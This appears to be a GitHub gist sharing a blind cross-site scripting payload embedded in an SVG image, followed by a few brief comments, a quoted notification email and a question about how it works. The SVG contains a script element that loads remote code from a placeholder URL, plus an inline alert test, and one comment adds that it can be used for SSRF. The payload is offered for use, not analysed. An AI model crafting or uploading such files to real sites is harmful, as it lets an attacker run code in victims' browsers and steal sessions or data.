Blind XSS in SVG FILE

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
  "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  <svg width="200"
       height="200"
       zoomAndPan="disable"
       xmlns="http://www.w3.org/2000/svg"
       xmlns:xlink="http://www.w3.org/1999/xlink"
       xml:space="preserve">
    <!-- Script linked from the outside-->
    <script xlink:href="https://your-urls-here" />
    <script>
      //<![CDATA[
        alert("ble");
      ]]>
    </script>
  </svg>

It can be used for SSRF too

Interesting <3

HAHA

…

On Mon, Sep 9, 2024 at 10:01 PM riyuzaki16 ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------ test — Reply to this email directly, view it on GitHub <https://gist.github.com/ioribrn/aafd49c7c3a5cc7e1ba4848b75a52f4b#gistcomment-5183768> or unsubscribe <https://github.com/notifications/unsubscribe-auth/AQ5C32OWENHLBKX7KGAFQYTZVXWAZBFKMF2HI4TJMJ2XIZLTSKBKK5TBNR2WLJDUOJ2WLJDOMFWWLO3UNBZGKYLEL5YGC4TUNFRWS4DBNZ2F6YLDORUXM2LUPGBKK5TBNR2WLJDHNFZXJJDOMFWWLK3UNBZGKYLEL52HS4DFVRZXKYTKMVRXIX3UPFYGLK2HNFZXIQ3PNVWWK3TUUZ2G64DJMNZZDAVEOR4XAZNEM5UXG5FFOZQWY5LFVEYTAMJYGMYTGNJSU52HE2LHM5SXFJTDOJSWC5DF> . You are receiving this email because you commented on the thread. Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub> .

**Steiner-254 ** commented Sep 10, 2024 via email

bro can you explain how is this a blind xss?